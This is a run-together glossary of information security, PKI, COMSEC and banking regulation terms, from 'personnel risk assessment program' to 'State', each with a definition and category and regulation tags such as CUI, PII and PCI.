personnel risk assessment programnounA documented listing of procedures and instructions to be performed to complete a personnel risk assessment.ProcessRegulated
physical accessnounThe ability of people to physically gain access to a computer system or facility.ControlRegulated
physical access control systemnounPhysical access control enables an authority to control admission to areas and resources in a physical facility. A physical access control system may restrict access via swipe cards, Personal Identity Verification (PIV) 'Smart' cards, and biometric (i.e. fingerprint) readers. Physical access control systems are generally seen as the second layer in the security of a physical facility after fences, doors and barriers.ControlRegulated
Physical Access Control system maintenance and testing programnounA documented listing of procedures, schedules, roles and responsibilities, and plans to be performed to ensure continued maintenance and testing of the Physical Access Control System.ControlRegulatedCUI
physical securitynounThe protection of personnel, hardware, programs, networks, and data from physical circumstances and events that could cause serious losses or damage to an enterprise, agency, or institution. This includes protection from fire, natural disasters, burglary, theft, vandalism, and terrorism.ControlRegulated
physical security perimeternounA type of gate, door, wall, or fence system that is intended to restrict and control the physical access or egress of personnel.PhysicalRegulated
physical security plannounA formal document that provides an overview of the security requirements for a physical security program and describes the security controls in place or planned for meeting those requirements.ArtifactRegulatedCUI
PII Confidentiality Impact LevelnounThe PII confidentiality impact level—low, moderate, or high—indicates the potential harm that could result to the subject individuals and/or the organization if PII were inappropriately accessed, used, or disclosed.MetricRegulatedPII
plaintextnounIntelligible data that has meaning and can be understood without the application of decryption.DataRegulated
Plan of Action and MilestonesnounA document that identifies tasks needing to be accomplished. It details resources required to accomplish the elements of the plan, any milestones in meeting the tasks, and scheduled completion dates for the milestones.ArtifactRegulatedCUI
Point-of-sale (POS) networknounA network of institutions, debit cardholders, and merchants that permit consumers to make direct payment electronically at the place of purchase. The funds are withdrawn from the account of the cardholder.NetworkRegulatedPCI
Policy Approving AuthoritynounFirst level of the PKI Certification Management Authority that approves the security policy of each PCA.RoleRegulated
Policy Certification AuthoritynounSecond level of the PKI Certification Management Authority that formulates the security policy under which it and its subordinate CAs will issue public key certificates.OrganizationRegulated
Policy Management AuthoritynounBody established to oversee the creation and update of Certificate Policies, review Certification Practice Statements, review the results of CA audits for policy compliance, evaluate non-domain policies for acceptance within the domain, and generally oversee and manage the PKI certificate policies. For the FBCA, the PMA is the Federal PKI Policy Authority.OrganizationRegulated
Policy MappingnounRecognizing that, when a CA in one domain certifies a CA in another domain, a particular certificate policy in the second domain may be considered by the authority of the first domain to be equivalent (but not necessarily identical in all respects) to a particular certificate policy in the first domain.ProcessRegulated
portnounA physical entry or exit point of a cryptographic module that provides access to the module for physical signals, represented by logical information flows (physically separated ports do not share the same physical pin or wire).NetworkRegulated
Portable Electronic DevicenounAny nonstationary electronic apparatus with singular or multiple capabilities of recording, storing, and/or transmitting data, voice, video, or photo images. This includes but is not limited to laptops, personal digital assistants, pocket personal computers, palmtops, MP3 players, cellular telephones, thumb drives, video cameras, and pagers.PhysicalRegulatedCUI
Positive Control MaterialnounGeneric term referring to a sealed authenticator system, permissive action link, coded switch system, positive enable system, or nuclear command and control documents, material, or devices.PhysicalRegulatedCUI
Positive paynounA technique that can reduce check fraud by requesting businesses to send electronic files of information to the financial institution on all checks the business has issued.ControlRegulated
Prediction ResistancenounPrediction resistance is provided relative to time T if there is assurance that an adversary who has knowledge of the internal state of the DRBG at some time prior to T would be unable to distinguish between observations of ideal random bitstrings and bitstrings output by the DRBG at or subsequent to time T. The complementary assurance is called Backtracking Resistance.ControlRegulated
Presentment feenounA fee that an institution receiving a check may impose on the institution that presents the check for payment. No presentment fee may be charged for checks presented by 8 a.m. local time.RequirementRegulated
previous residencenounA location where someone was living before where that person is currently living.DataRegulatedPII
Primary Services NodenounA Key Management Infrastructure core node that provides the users’ central point of access to KMI products, services, and information.SystemRegulatedCUI
Principal Certification AuthoritynounThe Principal Certification Authority is a CA designated by an agency to interoperate with the FBCA. An agency may designate multiple Principal CAs to interoperate with the FBCA.IdentityRegulatedCUI
Print SuppressionnounEliminating the display of characters in order to preserve their secrecy.ControlRegulated
prior tonounThis limits a Control or Mandate's secondary verb to be put into play before the event takes place.RequirementRegulated
PrivacynounRestricting access to subscriber or Relying Party information in accordance with federal law and agency policy.RequirementRegulated
Privacy SystemnounCommercial encryption system that affords telecommunications limited protection to deter a casual listener, but cannot withstand a technically competent cryptanalytic attack.SystemRegulated
Privileged CommandnounA human-initiated command executed on an information system involving the control, monitoring, or administration of the system including security functions and associated security-relevant information.ProcessRegulatedCUI
processing requirementnounA condition that must be fulfilled in order for something to be processed.RequirementRegulated
Product Source NodenounThe Key Management Infrastructure core node that provides central generation of cryptographic key material.SystemRegulatedCUI
productionnounThe purpose of this task is to transform tangible inputs and intangible inputs into goods or services, to create output or deliverables (goods or services) for another party, and to retrieve documents and make them available for use in a legal proceeding, especially as part of discovery.ProcessRegulated
ProfilingnounMeasuring the characteristics of expected activity so that changes to it can be more easily identified.ProcessRegulatedPII
Proof of deposit (POD)nounThe verification of the dollar amount written on a negotiable instrument being deposited.ArtifactRegulated
Protected Distribution SystemnounWire line or fiber optic system that includes adequate safeguards and/or countermeasures (e.g., acoustic, electric, electromagnetic, and physical) to permit its use for the transmission of unencrypted information through an area of lesser classification or control.NetworkRegulatedCUI
Protective Distribution SystemnounWire line or fiber optic system that includes adequate safeguards and/or countermeasures (e.g., acoustic, electric, electromagnetic, and physical) to permit its use for the transmission of unencrypted information.SystemRegulatedCUI
Protective PackagingnounPackaging techniques for COMSEC material that discourage penetration, reveal a penetration has occurred or was attempted, or inhibit viewing or copying of keying material prior to the time it is exposed for use.ControlRegulatedCUI
Protective TechnologiesnounSpecial tamper-evident features and materials employed for the purpose of detecting tampering and deterring attempts to compromise, modify, penetrate, extract, or substitute information processing equipment and keying material.ControlRegulatedCUI
protective technologynounSpecial tamper-evident features and materials employed for the purpose of detecting tampering and deterring attempts to compromise, modify, penetrate, extract, or substitute information processing equipment and keying material.ControlRegulated
QuadrantnounShort name referring to technology that provides tamper-resistant protection to cryptographic equipment.PhysicalRegulatedCUI
Radiation MonitoringnounRadiation monitoring is the process of receiving images, data, or audio from an unprotected source by listening to radiation signals.ProcessRegulated
RandomizernounAnalog or digital source of unpredictable, unbiased, and usually independent bits. Randomizers can be used for several different functions, including key generation or to provide a starting state for a key generator.CapabilityRegulated
Real time gross settlement (RTGS) SystemnounA type of payments system operating in real time rather than batch processing mode. It provides immediate finality of transactions. Gross settlement refers to the settlement of each transfer individually rather than netting. FedwireÒ is an example of a real time gross settlement system.SystemRegulated
ReceivernounAn individual, corporation, or other entity that has authorized a company or an originator to initiate a credit or debit entry to a transaction account belonging to the receiver held at its RDFI.IdentityRegulatedPII
Receiving depository financial institution (RDFI)nounAny financial institution qualified to receive debits or credits through its ACH operator in accordance with the ACH rules.OrganizationRegulated
Recipient Usage PeriodnounThe period of time during the cryptoperiod of a symmetric key when protected information is processed.MetricRegulated
Reconverting bank (Check 21)nounThe financial institution that creates a substitute check. With respect to a substitute check that was created by a person that is not a financial institution, the reconverting bank is the first financial institution that transfers, presents, or returns that substitute check or, in lieu thereof, the first paper or electronic representation of that substitute check. The reconverting bank warrants that (1) the substitute check is the legal equivalent of the original check; and (2) the original check cannot be presented again in any form so the customer pays the check only once.OrganizationRegulated
recordnounAnything that is put down in permanent form and preserved as evidence.ArtifactRegulatedPII
Records ManagementnounThe process for tagging information for records-keeping requirements as mandated in the Federal Records Act and the National Archival and Records Requirements.ProcessRegulatedCUI
Recover FunctionnounDevelop and implement the appropriate activities to maintain plans for resilience and to restore any capabilities or services that were impaired due to a cybersecurity event.ProcessRegulated
recovery plannounThe written expression of a recovery process which consists of defining rules, processes, and disciplines to ensure that the critical business processes will continue to function if there is a failure of one or more of the information processing or telecommunications resources upon which their operations depends. The following are key elements to a disaster recovery plan: 1) Establish a planning group, 2) Perform risk assessment and audits, 3) Establish priorities for applications and networks, 4) Develop recovery strategies, 5) Prepare inventory and documentation of the plan, 6) Develop verification criteria and procedures, 5) Implement the plan.ProcessRegulated
Recovery ProceduresnounActions necessary to restore data files of an information system and computational capability after a system failure.ProcessRegulatedCUI
Recovery service levelsnounCollectively, terms that define the speed, quality, and quantity of recovery capability in response to a disaster, including recovery time objective, recovery point objective, timely notification, percentage of normal production service level agreements (SLAs) that will be delivered during recovery mode, etc.RequirementRegulated
REDnounIn cryptographic systems, refers to information or messages that contain sensitive or classified information that is not encrypted. See also BLACK.DataRegulatedCUI
Red SignalnounAny electronic emission (e.g., plain text, key, key stream, subkey stream, initial fill, or control signal) that would divulge national security information if recovered.VulnerabilityRegulatedCUI
Red/Black ConceptnounSeparation of electrical and electronic circuits, components, equipment, and systems that handle unencrypted information (Red), in electrical form, from those that handle encrypted information (Black) in the same form.ControlRegulatedCUI
RegistrationnounThe process through which a party applies to become a subscriber of a Credentials Service Provider (CSP) and a Registration Authority validates the identity of that party on behalf of the CSP.ProcessRegulatedPII
Registration authoritynounA trusted entity that establishes and vouches for the identity of a Subscriber to a CSP. The RA may be an integral part of a CSP, or it may be independent of a CSP, but it has a relationship to the CSP(s).OrganizationRegulatedPII
Regulation CCnounA regulation (12 CFR 229) promulgated by the Board of Governors of the Federal Reserve System regarding the availability of funds and the collection of checks. The regulation governs the availability of funds deposited in checking accounts and the collection and return of checks.RequirementRegulated
Regulation EnounA regulation (12 CFR 205) promulgated by the Board of Governors of the Federal Reserve System to ensure consumers a minimum level of protection in disputes arising from electronic fund transfers.RequirementRegulated
Regulation ZnounRegulation Z, the Truth in Lending Act (TILA) (12 CFR 226) promulgated by the Board of Governors of the Federal Reserve System. The regulation prescribes uniform methods for computing the cost of credit, disclosing credit terms, and resolving errors on certain types of credit accounts.RequirementRegulated
regulatory noticenounAny documented (in print or electronic format) notice used to inform affected parties regarding regulatory issues.ArtifactRegulated
Regulatory requirementsnounRules or laws that regulate conduct and that the enterprise must obey to become compliantRequirementRegulated
Release PrefixnounPrefix appended to the short title of U.S.-produced keying material to indicate its foreign releasability. "A" designates material that is releasable to specific allied nations, and "U.S." designates material intended exclusively for U. S. use.ArtifactRegulatedCUI
RemanencenounResidual information remaining on storage media after clearing. See Magnetic Remanence and Clearing.VulnerabilityRegulatedCUI
remedial actionnounAction taken to implement long-term restoration of environmental quality.ControlRegulated
Remittance cardsnounPayment cards that are typically used to facilitate cross-border movement of funds by individuals and for person-to-person transactions.DataRegulatedPCI
remote accessnounAccess to an organization's nonpublic information system by an authorized user (or an information system) communicating through an external, non-organization-controlled network (e.g., the Internet).CapabilityRegulated
Remote access servicenounRefers to any combination of hardware and software to enable the remote access to tools or information that typically reside on a network of IT devices Scope Note: Originally coined by Microsoft when referring to their built-in NT remote access tools, RAS was a service provided by Windows NT which allowed most of the services that would be available on a network to be accessed over a modem link. Over the years, many vendors have provided both hardware and software solutions to gain remote access to various types of networked information. In fact, most modern routers include a basic RAS capability that can be enabled for any dial-up interface.SystemRegulated
Remote deletionsnounUse of a technology to remove data from a portable device without touching the device.CapabilityRegulated
Remote deposit capture (RDC)nounA service that enables users at remote locations to scan digital images of checks and transmit the captured data to a financial institution or a merchant that is a customer of a financial institution.CapabilityRegulatedPCI
Remote Diagnostics/MaintenancenounMaintenance activities conducted by authorized individuals communicating through an external network (e.g., the Internet).ProcessRegulated
Remote journalingnounProcess used to transmit journal or transaction logs in real time to a back-up location.ProcessRegulated
remote maintenancenounMaintenance activities conducted by individuals communicating external to an information system security perimeter.ProcessRegulated
Remote RekeyingnounProcedure by which a distant crypto-equipment is rekeyed electrically. See Automatic Remote Rekeying and Manual Remote Rekeying.ProcessRegulatedCUI
Remotely created check (RCC)nounA check that is drawn on a customer account at a financial institution, is created by the payee, and does not bear a signature in the format agreed to by the paying financial institution and customer. RCCs are also known as "demand drafts," "telechecks," "preauthorized drafts," "paper drafts," or "digital checks."DataRegulatedPCI
Removable medianounPortable electronic storage media such as magnetic, optical, and solid-state devices, which can be inserted into and removed from a computing device, and that is used to store text, video, audio, and image information. Such devices have no independent processing capabilities. Examples include hard disks, floppy disks, zip drives, compact disks (CDs), thumb drives, pen drives, and similar USB storage devices.PhysicalRegulated
removable storage medianounPortable electronic storage media such as magnetic, optical, and solid-state devices, which can be inserted into and removed from a computing device, and that is used to store text, video, audio, and image information. Such devices have no independent processing capabilities. Examples include hard disks, floppy disks, zip drives, compact disks (CDs), thumb drives, pen drives, and similar USB storage devices.PhysicalRegulated
Repair ActionnounNSA-approved change to a COMSEC end-item that does not affect the original characteristics of the end-item and is provided for optional application by holders. Repair actions are limited to minor electrical and/or mechanical improvements to enhance operation, maintenance, or reliability. They do not require an identification label, marking, or control but must be fully documented by changes to the maintenance manual.ControlRegulatedCUI
reportnounTo give a spoken or written account of something that has been seen, done etc.ArtifactRegulated
Report of ExaminationnounThe report prepared by the Board, or other federal or state financial institution supervisory agency, concerning the examination of a financial institution, and includes reports of inspection and reports of examination of U.S. branches or agencies of foreign banks and representative offices of foreign organizations, and other institutions examined by the Federal Reserve System.ArtifactRegulated
reportable cyber incidentnounA Cyber Security Incident that has compromised or disrupted one or more reliability tasks of a functional entity.EventRegulatedCUI
reporting requirementnounSet by the organization, this requires third parties to provide certain update and other status reports, such as work status, Service Level Agreement status, etc.RequirementRegulated
RepositorynounA database containing information and data relating to certificates as specified in a CP; may also be referred to as a directory.DataRegulated
RepudiationnounThe denial by one of the parties to a transaction of participation in all or part of that transaction or of the content of the communication.RequirementRegulated
Reserve accountnounA non-interest-earning balance account institutions maintain with the Federal Reserve Bank or with a correspondent bank to satisfy the Federal Reserve's reserve requirements. Reserve account balances play a central role in the exchange of funds between depository institutions.DataRegulated
Reserve Keying MaterialnounKey held to satisfy unplanned needs. See Contingency Key.CredentialRegulatedCUI
Reserve requirementsnounThe percentage of deposits that a depository institution may not lend out or invest and must hold either as vault cash or on deposit at a Federal Reserve Bank. Reserve requirements affect the potential of the banking system to create transaction deposits.RequirementRegulated
ResiduenounData left in storage after information-processing operations are complete, but before degaussing or overwriting has taken place.DataRegulatedCUI
resilience by designnounThe embedding of security in technology and system development from the earliest stages of conceptualisation and design.RequirementRegulated
responsenounAn action taken that addresses an incident and assesses the level of containment and control activity required.ProcessRegulated
responsible entitynounAny group or even individual with an organization that has been given a particular responsibility for a particular process.RoleRegulated
Retail paymentsnounPayments, typically small, made in the goods and services market.DataRegulatedPCI
Retention requirementnounRequirement established by a company or by regulation for the length of time and/or for the amount of information that should be retained.RequirementRegulated
Return (ACH)nounAny ACH entry that has been returned to the ODFI by the RDFI or by the ACH operator because it cannot be processed. The reason for each return is included with the return in the form of a "return reason code." (See the NACHA "Operating Rules and Guidelines" for a complete reason code listing.)ArtifactRegulatedPCI
risk assessmentnounThe process of identifying, prioritizing, and estimating risks. This includes determining the extent to which adverse circumstances or events could impact an enterprise. Uses the results of threat and vulnerability assessments to identify risk to organizational operations and evaluates those risks in terms of likelihood of occurrence and impacts if they occur. The product of a risk assessment is a list of estimated potential impacts and unmitigated vulnerabilities. Risk assessment is part of risk management and is conducted throughout the Risk Management Framework (RMF).ProcessRegulated
risk management controlnounControls associated with instruments that introduce risks that require effective adherence to the relevant clearing house, association, interchange, and regulatory requirements.ControlRegulated
risk management programnounA documented listing of procedures, schedules, roles and responsibilities, and plans to be performed to identify, control, and reduce or eliminate risks to operations, assets, or individuals that are inherent to system development and operations.ProcessRegulated
Risk Mitigation PlannounThis record contains detailed proposals intended to reduce the risks to a critical asset, typically including actions or countermeasures designed to counter the threats to assets.ControlRegulatedCUI
Risk ProfilenounThis record contains an outline of the number, type, and potential effects of risks to which an asset or organization are exposed.ArtifactRegulated
risk-based approachnounAn approach whereby FMIs identify, assess and understand the risks to which they are exposed to and take measures commensurate with these risks.ProcessRegulated
risk-based authenticationnounAny risk-based system of authentication that detects anomalies or changes in the normal use patterns of a Person and require s additional verification of the Person’s identity when such deviations or changes are detected, such as through the use of challenge questions.ControlRegulatedPII
RloginnounRemote login. A UNIX utility that allows a user to login to a remote host on a network, as if it were directly connected, and make use of various services. Remote login is an information exchange between network-connected devices where the information cannot be reliably protected end-to-end by a single organization's security controls.CapabilityRegulated
Routing numbernounAlso referred to as the ABA number. A nine-digit number (eight digits and a check digit) that identifies a specific financial institution.DataRegulated
rulenounA principle, condition, or regulation that customarily governs behavior or procedure within a particular area of activity.RequirementRegulated
RulesetnounA set of directives that govern the access control functionality of a firewall. The firewall uses these directives to determine how packets should be routed between its interfaces.ControlRegulated
S/KeynounA security mechanism that uses a cryptographic hash function to generate a sequence of 64-bit, one-time passwords for remote user login. The client generates a one-time password by applying the MD4 cryptographic hash function multiple times to the user's secret key. For each successive authentication of the user, the number of hash applications is reduced by one.CredentialRegulated
Safeguarding StatementnounStatement affixed to a computer output or printout that states the highest classification being processed at the time the product was produced and requires control of the product, at that level, until determination of the true classification by an authorized individual. Synonymous with banner.ArtifactRegulatedCUI
SanitizationnounA general term referring to the actions taken to render data written on media unrecoverable by both ordinary and, for some forms of sanitization, extraordinary means.ProcessRegulated
SAS 70 reportnounAn audit report of a servicing institution prepared in accordance with guidance provided in the American Institute of Certified Public Accountant's Statement of Auditing Standards Number 70. Replaced by SSAE 16.ArtifactRegulated
Satellite technologynounThese links efficiently extend the reach of typical communication systems to distant areas and provide alternative traffic routing in an emergency.SystemRegulated
Scoping GuidancenounA part of tailoring guidance providing organizations with specific policy/regulatory-related, technology-related, system component allocation-related, operational/environmental-related, physical infrastructure-related, public access-related, scalability-related, common control-related, and security objective-related considerations on the applicability and implementation of individual security controls in the security control baseline.RequirementRegulatedCUI
Secure CommunicationsnounTelecommunications deriving security through use of NSA-approved products and/or Protected Distribution Systems.CapabilityRegulatedCUI
secure development practicenounA software development practice where the confidentiality, integrity, and availability of the software code is protected against threats and vulnerabilities.ProcessRegulatedIP
secure disposalnounThe process of erasing or overwriting data stored on media before relinquishing control of said media when no longer required, in a manner that ensures that no data can be recovered from the media.ProcessRegulated
Secure Electronic TransactionnounA standard that will ensure that credit card and associated payment order information travels safely and securely between the various involved parties on the Internet.FrameworkRegulatedPCI
Secure ErasenounAn overwrite technology using firmware-based process to overwrite a hard drive. Is a drive command defined in the ANSI ATA and SCSI disk drive interface specifications, which runs inside drive hardware. It completes in about 1/8 the time of 5220 block erasure.ControlRegulated
Secure Socket LayernounA protocol used for protecting private information during transmission via the Internet. Note: SSL works by using a public key to encrypt data that's transferred over the SSL connection. Most Web browsers support SSL, and many Web sites use the protocol to obtain confidential user information, such as credit card numbers. By convention, URLs that require an SSL connection start with “https:” instead of “http:.”NetworkRegulatedPCI
Secure Sockets LayernounA protocol that is used to transmit private documents through the Internet Scope Note: The SSL protocol uses a private key to encrypt the data that are to be transferred through the SSL connection.NetworkRegulated
Secure SubsystemnounSubsystem containing its own implementation of the reference monitor concept for those resources it controls. Secure subsystem must depend on other controls and the base operating system for the control of subjects and the more primitive system objects.SystemRegulated
Secure/Multipurpose Internet Mail ExtensionsnounA set of specifications for securing electronic mail. S/MIME is based upon the widely used MIME standard [MIME] and describes a protocol for adding cryptographic security services through MIME encapsulation of digitally signed and encrypted objects. The basic security services offered by S/MIME are authentication, non-repudiation of origin, message integrity, and message privacy. Optional security services include signed receipts, security labels, secure mailing lists, and an extended method of identifying the signer’s certificate(s).ControlRegulated
Security AttributenounAn abstraction representing the basic properties or characteristics of an entity with respect to safeguarding information; typically associated with internal data structures (e.g., records, buffers, files) within the information system which are used to enable the implementation of access control and flow control policies; reflect special dissemination, handling, or distribution instructions; or support other aspects of the information security policy.DataRegulatedCUI
Security auditnounAn independent review and examination of system records and activities to test for adequacy of system controls, ensure compliance with established policy and operational procedures, and recommend any indicated changes in control, policy, and procedures.ProcessRegulated
Security Awareness programnounThe documented plan and documented activities to create well-informed interest in being free from danger or threat.ProcessRegulatedCUI
Security BannernounA banner at the top or bottom of a computer screen that states the overall classification of the system in large, bold type. Also can refer to the opening screen that informs users of the security implications of accessing a computer resource.ControlRegulatedCUI
Security breachnounA security event that results in unauthorized access of data, applications, services, networks, or devices by bypassing underlying security mechanisms.EventRegulated
Security CategorizationnounThe process of determining the security category for information or an information system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS 199 for other than national security systems.ProcessRegulatedCUI
Security CategorynounThe characterization of information or an information system based on an assessment of the potential impact that a loss of confidentiality, integrity, or availability of such information or information system would have on organizational operations, organizational assets, individuals, other organizations, and the Nation.RequirementRegulated
security controlnounA safeguard or countermeasure to avoid, counteract or minimize security risks relating to personal property, or any company property. For business-to-business facing organizations whose service may affect the financial statements of the other company, the prospect may require successful audit reports of policy controls.ControlRegulated
Security Control AssessmentnounThe testing and/or evaluation of the management, operational, and technical security controls in an information system to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.ControlRegulatedCUI
Security Control BaselinenounOne of the sets of minimum security controls defined for federal information systems in NIST Special Publication 800-53 and CNSS Instruction 1253.ControlRegulated
Security Controls BaselinenounThe set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system.RequirementRegulatedCUI
security eventnounAn event that potentially compromises the confidentiality, integrity, availability, or accountability of an information system.EventRegulated
Security Event LognounThis record contains records of any security-related and auditing-related events.EventRegulatedCUI
security incidentnounAn adverse event where a threat or exploit may compromise a computer system and cause: loss of data confidentiality, disruption of system or data integrity, or disruption or denial of availability of the system and/or data.EventRegulated
security incident response plannounThe steps taken during an incident. An incident response plan brings together and organizes the resources for dealing with any event that harms or threatens the security of information assets. Such an event may be a malicious code attack, an unauthorized access to information or systems, the unauthorized use of services, a denial of service attack, or a hoax.ProcessRegulated
Security KernelnounHardware, firmware, and software elements of a trusted computing base implementing the reference monitor concept. Security kernel must mediate all accesses, be protected from modification, and be verifiable as correct.SystemRegulated
Security LabelnounInformation that represents or designates the value of one or more security relevant-attributes (e.g., classification) of a system resource.ControlRegulated
Security lognounA record that contains log-in and logout activity and other security-related events and that is used to track security-related information on a computer system.ArtifactRegulated
Security MarkingnounHuman-readable information affixed to information system components, removable media, or output indicating the distribution limitations, handling caveats, and applicable security markings.ArtifactRegulatedCUI
Security Net Control StationnounManagement system overseeing and controlling implementation of network security policy.SystemRegulatedCUI
security patchnounComputer code intended to repair or lessen the impact of vulnerabilities within application software.ControlRegulated
security patchingnounThe purpose of this task is to distribute patches to apply security patches to organizational operating systems and applications.ProcessRegulated
security patching processnounThe series of steps taken to acquire, test, and distribute security patches to the appropriate administrators and users throughout the organization.ProcessRegulated
security practicenounThe actions an organization takes to initiate, implement, and maintain organizational security.ProcessRegulated
Security RangenounHighest and lowest security levels that are permitted in or on an information system, system component, subsystem, or network.RequirementRegulatedCUI
security requirementnounA necessary condition that must be met to ensure the confidentiality, integrity, and availability of the information being processed, stored, or transmitted.RequirementRegulated
Security Requirements BaselinenounDescription of the minimum requirements necessary for an information system to maintain an acceptable level of risk.RequirementRegulated
Security Requirements RequirementsnounRequirements levied on an information system that are derived from applicable laws, Executive Orders, directives, policies, standards, instructions, regulations, or procedures, or organizational mission/business case needs to ensure the confidentiality, integrity, and availability of the information being processed, stored, or transmitted.RequirementRegulated
Security Requirements Traceability MatrixnounMatrix that captures all security requirements linked to potential risks and addresses all applicable C&A requirements. It is, therefore, a correlation statement of a system’s security features and compliance methods for each security requirement.ArtifactRegulatedCUI
Security TagnounInformation unit containing a representation of certain security-related information (e.g., a restrictive attribute bit map).DataRegulatedCUI
Security TargetnounCommon Criteria specification that represents a set of security requirements to be used as the basis of an evaluation of an identified Target of Evaluation (TOE).RequirementRegulated
Security Test & EvaluationnounExamination and analysis of the safeguards required to protect an information system, as they have been applied in an operational environment, to determine the security posture of that system.ProcessRegulatedCUI
Security violationnounAn instance in which a user or other person circumvents or defeats the controls of a system to obtain unauthorized access to information or system resources.EventRegulated
Senior Agency Information Security OfficernounOfficial responsible for carrying out the Chief Information Officer responsibilities under the Federal Information Security Management Act (FISMA) and serving as the Chief Information Officer’s primary liaison to the agency’s authorizing officials, information system owners, and information system security officers. SP 800-53 Note: Organizations subordinate to federal agencies may use the term Senior Information Security Officer or Chief Information Security Officer to denote individuals filling positions with similar responsibilities to Senior Agency Information Security Officers.RoleRegulated
Sensitive Compartmented InformationnounClassified information concerning or derived from intelligence sources, methods, or analytical processes, which is required to be handled within formal access control systems established by the Director of National Intelligence.DataRegulatedCUI
Sensitive Compartmented Information FacilitynounAccredited area, room, or group of rooms, buildings, or installation where SCI may be stored, used, discussed, and/or processed.PhysicalRegulatedCUI
Sensitive customer informationnounA customer’s name, address, or telephone number, in conjunction with the customer’s social security number, driver’s license number, account number, credit or debit card number, or personal identification number or password that would permit access to the customer’s account. Sensitive customer information also includes any combination of components of customer information that would allow someone to log into or access the customer’s account, such as user name and password or password and account number.DataRegulatedPII
sensitive datanounInformation whose loss, misuse, unauthorized access to, modification, or destruction, could adversely affect the national interest or the conduct of federal programs, or privacy to which individuals are entitled, but which has not been specifically authorized to be kept secret in the interest of national defense or foreign policy, etc.DataRegulatedCUI
Sensitive InformationnounInformation, the loss, misuse, or unauthorized access to or modification of, that could adversely affect the national interest or the conduct of federal programs, or the privacy to which individuals are entitled under 5 U.S.C. Section 552a (the Privacy Act), but that has not been specifically authorized under criteria established by an Executive Order or an Act of Congress to be kept classified in the interest of national defense or foreign policy. (Systems that are not national security systems, but contain sensitive information, are to be protected in accordance with the requirements of the Computer Security Act of 1987 [P.L.100-235].)DataRegulatedCUI
Sensitivity LabelnounInformation representing elements of the security label(s) of a subject and an object. Sensitivity labels are used by the trusted computing base (TCB) as the basis for mandatory access control decisions. See Security Label.DataRegulatedCUI
service providernounFor purposes of the Information Security Standards, service provider means any person or entity that maintains, processes, or otherwise is permitted access to customer information or consumer information through its provision of services directly to a financial institution.OrganizationRegulatedPII
SettlementnounThe final step in the transfer of ownership involving the physical exchange of securities or payment. In a banking transaction, settlement is the process of recording the debit and credit positions of the parties involved in a transfer of funds. In a financial instrument transaction, settlement includes both the transfer of securities by the seller and the payment by the buyer. Settlements can be "gross" or "net." Gross settlement means each transaction is settled individually. Net settlement means parties exchanging payments will offset mutual obligations to deliver identical items (e.g., dollars or EUROS), at a specified time, after which only one net amount of each item is exchanged.ProcessRegulated
Settlement date (ACH)nounThe date on which an exchange of funds with respect to an entry is reflected on the books of the Federal Reserve Bank.DataRegulated
shared accountnounA single local account created for a group, with one user name and one password.IdentityRegulatedCUI
Shielded EnclosurenounRoom or container designed to attenuate electromagnetic radiation, acoustic signals, or emanations.PhysicalRegulatedCUI
Short positionnounIn respect of a currency balance that is less than zero, the amount by which such currency balance is less than zero. An investment position that benefits from a decline in market price. When one sells a currency their position is short.MetricRegulated
Short position limitnounIn respect of an eligible currency, the maximum short position a Settlement Member may have at any time in that eligible currency and, unless otherwise reduced pursuant to the CLS Bank Rules, shall equal (i) the total amount of all available committed liquidity facilities in such eligible currency (or such lesser amount that CLS Bank may determine from time to time) minus (ii) the amount of the largest available committed liquidity facility among such liquidity facilities (after taking into account any amounts already drawn.RequirementRegulated
Short TitlenounIdentifying combination of letters and numbers assigned to certain COMSEC materials to facilitate handling, accounting, and controlling.ArtifactRegulatedCUI
Signals AnalysisnounGaining indirect knowledge of communicated data by monitoring and analyzing a signal that is emitted by a system and that contains the data but is not intended to communicate the data.CapabilityRegulated
Signature GenerationnounThe process of using a digital signature algorithm and a private key to generate a digital signature on data.ProcessRegulated
Signature ValidationnounThe (mathematical) verification of the digital signature and obtaining the appropriate assurances (e.g., public key validity, private key possession, etc.).ControlRegulated
Significant firmsnounFirms that process a significant share of transactions in critical financial markets.OrganizationRegulated
Single Point KeyingnounMeans of distributing key to multiple, local crypto equipment or devices from a single fill point.ProcessRegulatedCUI
Single-Entry (ACH)nounA one-time transfer of funds initiated by an originator in accordance with the receiver's authorization for a single ACH credit or debit to the receiver's consumer account.DataRegulatedPCI
SkimmingnounThe unauthorized use of a reader to read tags without the authorization or knowledge of the tag’s owner or the individual in possession of the tag.ThreatRegulatedPII
Smart cardnounA credit card-sized card with embedded integrated circuits that can store, process, and communicate information.PhysicalRegulated
software assurancenounLevel of confidence that software is free from vulnerabilities, either intentionally designed into the software or accidentally inserted at any time during its life cycle, and that the software functions in the intended manner.CapabilityRegulated
Software System Test and Evaluation ProcessnounProcess that plans, develops, and documents the qualitative/quantitative demonstration of the fulfillment of all baseline functional performance, operational, and interface requirements.ProcessRegulated
Sound practicesnounDefined in the "Interagency Paper on Sound Practices to Strengthen the Resilience of the U.S. Financial System," which was issued by the Board of Governors of the Federal Reserve System, Office of the Comptroller of the Currency, and Securities and Exchange Commission.RequirementRegulated
Special Access ProgramnounA program established for a specific class of classified information that imposes safeguarding and access requirements that exceed those normally required for information at the same classification level.ProcessRegulatedCUI
Special Access Program FacilitynounFacility formally accredited by an appropriate agency in accordance with DCID 6/9 in which SAP information may be processed.PhysicalRegulatedCDI
SpillagenounSecurity incident that results in the transfer of classified or CUI information onto an information system not accredited (i.e., authorized) for the appropriate security level.EventRegulatedCUI
Split Knowledgenoun1. Separation of data or information into two or more parts, each part constantly kept under control of separate authorized individuals or teams so that no one individual or team will know the whole data. 2. A process by which a cryptographic key is split into multiple key components, individually sharing no knowledge of the original key, which can be subsequently input into, or output from, a cryptographic module by separate entities and combined to recreate the original cryptographic key.ControlRegulatedCUI
SpotnounThe most common foreign exchange transaction. Spot or spot date refers to the spot transaction value date that requires settlement within two business days, subject to value date calculation.ProcessRegulated
Sreen scrapingnounA process used by information aggregators to gather information from a customer's website, whereby the aggregator accesses the target site by logging in as the customer, electronically reads and copies selected information from the displayed webpage(s), then redisplays the information on the aggregator's site. The process is analogous to "scraping" the information off the computer screen.ProcessRegulatedPII
Standard Entry Class (SEC) codenounThree-character code in an ACH company/batch header record used to identify the payment type within an ACH batch.DataRegulated
Start-Up KEKnounKey-encryption-key held in common by a group of potential communicating entities and used to establish ad hoc tactical networks.CredentialRegulatedCUI
StatenounIntermediate Cipher result that can be pictured as a rectangular array of bytes.DataRegulated
